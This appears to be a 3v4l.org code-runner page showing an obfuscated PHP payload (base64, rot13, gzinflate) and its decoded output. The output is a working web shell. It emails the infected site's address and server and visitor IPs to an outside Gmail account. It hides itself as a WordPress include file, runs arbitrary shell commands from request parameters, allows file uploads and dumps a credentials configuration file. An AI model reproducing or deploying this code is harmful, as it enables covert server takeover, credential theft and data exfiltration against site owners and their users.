3v4l.org

run code in 150+ php & hhvm versions
Bugs & Features
<?php print gzinflate(str_rot13(base64_decode('rUl6QuNTEP5cJP7Dso1xVAcO16rSCQg6CqZRLYTGVr8Ashx7k+xu7027eGUp4r9qc9fOy8FE7mdEpNjz+swzs7NuV1YVK0lXcriY+vvtw+0tPiH+DteaGb8VVG4U9fpKN944+ZTce2rt9kKP21utB665VnIlDOmSfWN3zdkYHtFu8EI4uKEXw+FofNGPhvQO1Vx82kMPwr9UbjSMVIOeMxjLeQEWNMkSslXElIAHWA25FRga/Sma6XHCiv2MgelULms8BZQeCuNPc8xb4l8atslwWLO0RdwsIHxnZR7Gl/2zEAL0z8/p4dP2Fss1e8XqCox5d6ZXprqQZCa1GS9RRTB/TJHnfuOTs7MB0EfXzO6NRxDkeEGD8LI/DNecioTnPh0vlHGpR+XHKQqCRxZnl0NYEt2lF4nmOfkdO5IIMjOmPOhnGpqAsKaSW9G7JhFGDwwx1AXcCgLSnnJKKhA3MKkF/azjaINKPD2za/fOEsQnfjM1f4TDGy/NpWA4MTgwTUkqcusj4FKng971MD7v/RVenVyGnh2DjHbDVmpyaNY/HV2GSsNr0O8PvbuAaeblHhd2XoEpPnhelDkLykyJA6KYcNjl2yUuYNsV8AOn5+Ba02bgpgeM0pkk9Mhjk7PjkfhGyLkgeySy2FY0cGx+1GTao7E6xld3l4mEM6b5v6z7C1ZyDh37+YP9gOExDZZsA23UGS+dWyCMK3Vrl/o0gDJwEAA3xgr9aUDbYs0xAgcopOJM11MqFvAIEZYpAlemK+X0WOU6rDflwwZPT4otjSvbzvZzmFYlRcOlIOUckhGcr2eeuXCWoshacKvqd6NHKbWP+l2v49lutKod1OVZS0h77z0qFDOVEgQlARg33X1ck9tWr+Uvpbi9/ZYcYP31JGgipMwDykdOCtwiwPQ1rkiSSw66lB6/QeipLIpRcQ2BVFyUlSFzRLIuNeyzoQQ57tK0yOimNqrGBV/pXRxXHpK8su/3YN9Occfe4SZFBg2yIYoqN7xZlLFpe0xvkgZsRg5J8z8ljMpcJhk55zmzcmfQ+kw1M55yWdR1tcO+bjAB/02Ns4mvtM75wVJ7FcUVm1vvA7IOby0+sum83/9J5xF5jg+UpGyiaNckGw4Oca2jcLPk1hW8Tu/abVLGYTzn3CzYym1xHDd9uToDOy2Lo/Gp4YDTo0jYhYwbOLrxGle8O7CzU2kOC/nAbxedcjEa+C+6mKKMnRt53SWawKapwfyQQ0ut2yPNR8ANyTLcC0LELXCyoY+qNHJNEwOi4MtjsLwOzgg9JEL2tD0juR76hnI4I5ayTUxx9taq102p2PoE/dpZ0L79wLLWuOdw9pmlPlOyW80NRAd96cZ32bxYixUETHBLKb4XgvwmDHfSQEMTAIDNiu3NAt5js3W4dYIOfOF9wqeVV/CQ23u53QAEz/W/EuQ7Q3u5Jnts4r0I/D8='))); ?>
based on eeCa7
Output for 4.3.0 - 5.6.28, hhvm-3.12.0, 7.0.0 - 7.1.0
error_reporting(0); if (!isset($_SESSION['bajak'])) { $visitcount = 0; $web = $_SERVER["HTTP_HOST"]; $inj = $_SERVER["REQUEST_URI"]; $body = "ada yang inject \n$web$inj"; $safem0de = @ini_get('safe_mode'); if (!$safem0de) {$security= "SAFE_MODE = OFF";} else {$security= "SAFE_MODE = ON";}; $serper=gethostbyname($_SERVER['SERVER_ADDR']); $injektor = gethostbyname($_SERVER['REMOTE_ADDR']); mail("byroecorp@gmail.com", "$body","Hasil Bajakan http://$web$inj\n$security\nIP Server = $serper\n IP Injector= $injektor"); $_SESSION['bajak'] = 0; } else {$_SESSION['bajak']++;}; if(isset($_GET['clone'])){ $source = $_SERVER['SCRIPT_FILENAME']; $desti =$_SERVER['DOCUMENT_ROOT']."/wp-includes/wp-simple.php"; rename($source, $desti); } $safem0de = @ini_get('safe_mode'); if (!$safem0de) {$security= "SAFE_MODE : OFF";} else {$security= "SAFE_MODE : ON";} echo "<title>UnKnown - Simple Shell</title><br>"; echo "<font size=2 color=#888888><b>".$security."</b><br>"; $cur_user="(".get_current_user().")"; echo "<font size=2 color=#888888><b>User : uid=".getmyuid().$cur_user." gid=".getmygid().$cur_user."</b><br>"; echo "<font size=2 color=#888888><b>Uname : ".php_uname()."</b><br>"; function pwd() { $cwd = getcwd(); if($u=strrpos($cwd,'/')){ if($u!=strlen($cwd)-1){ return $cwd.'/';} else{return $cwd;}; } elseif($u=strrpos($cwd,'\\')){ if($u!=strlen($cwd)-1){ return $cwd.'\\';} else{return $cwd;}; }; } echo '<form method="POST" action=""><font size=2 color=#888888><b>Command</b><br><input type="text" name="cmd"><input type="Submit" name="command" value="cok"></form>'; echo '<form enctype="multipart/form-data" action method=POST><font size=2 color=#888888><b>Upload File</b></font><br><input type=hidden name="submit"><input type=file name="userfile" size=28><br><font size=2 color=#888888><b>New name: </b></font><input type=text size=15 name="newname" class=ta><input type=submit class="bt" value="Upload"></form>'; if(isset($_POST['submit'])){ $uploaddir = pwd(); if(!$name=$_POST['newname']){$name = $_FILES['userfile']['name'];}; move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name); if(move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name)){ echo "Upload Failed"; } else { echo "Upload Success to ".$uploaddir.$name." :D "; } } if(isset($_POST['command'])){ $cmd = $_POST['cmd']; echo "<pre><font size=3 color=#000000>".shell_exec($cmd)."</font></pre>"; } elseif(isset($_GET['cmd'])){ $comd = $_GET['cmd']; echo "<pre><font size=3 color=#000000>".shell_exec($comd)."</font></pre>"; } elseif(isset($_GET['rf'])){ $rf = file_get_contents("../../configuration.php"); echo $rf; } else { echo "<pre><font size=3 color=#000000>".shell_exec('ls -la')."</font></pre>"; }
Output for hhvm-3.10.0

Process exited with code 153.